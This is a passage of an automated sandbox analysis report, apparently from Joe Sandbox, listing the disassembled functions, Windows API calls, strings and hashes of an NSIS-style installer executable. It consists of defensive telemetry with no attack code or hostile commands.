                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                    Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Char$Next$CreateDirectoryPrev
                                    • String ID:
                                    • API String ID: 4115351271-0
                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                                    Non-executed Functions

                                    Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                    • GetClientRect.USER32(?,?), ref: 00405196
                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                    • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                    • ShowWindow.USER32(00000008), ref: 00405333
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                    • CreatePopupMenu.USER32 ref: 00405376
                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                    • EmptyClipboard.USER32 ref: 00405411
                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                    • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                    • CloseClipboard.USER32 ref: 0040546E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                    • String ID: @rD$New install of "%s" to "%s"${
                                    • API String ID: 2110491804-2409696222
                                    • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                    • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                    Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                    • DeleteObject.GDI32(?), ref: 00404A79
                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                    • String ID: $ @$M$N
                                    • API String ID: 1638840714-3479655940
                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                    Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                    • String ID: 82D$@%F$@rD$A
                                    • API String ID: 3347642858-1086125096
                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                    Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                    • API String ID: 1916479912-1189179171
                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                    Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                    • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                    • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                    • FindClose.KERNEL32(?), ref: 00406E33
                                    Strings
                                    • \*.*, xrefs: 00406D03
                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                    • API String ID: 2035342205-3294556389
                                    • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                    • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                    Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                    • API String ID: 3581403547-784952888
                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                    Strings
                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
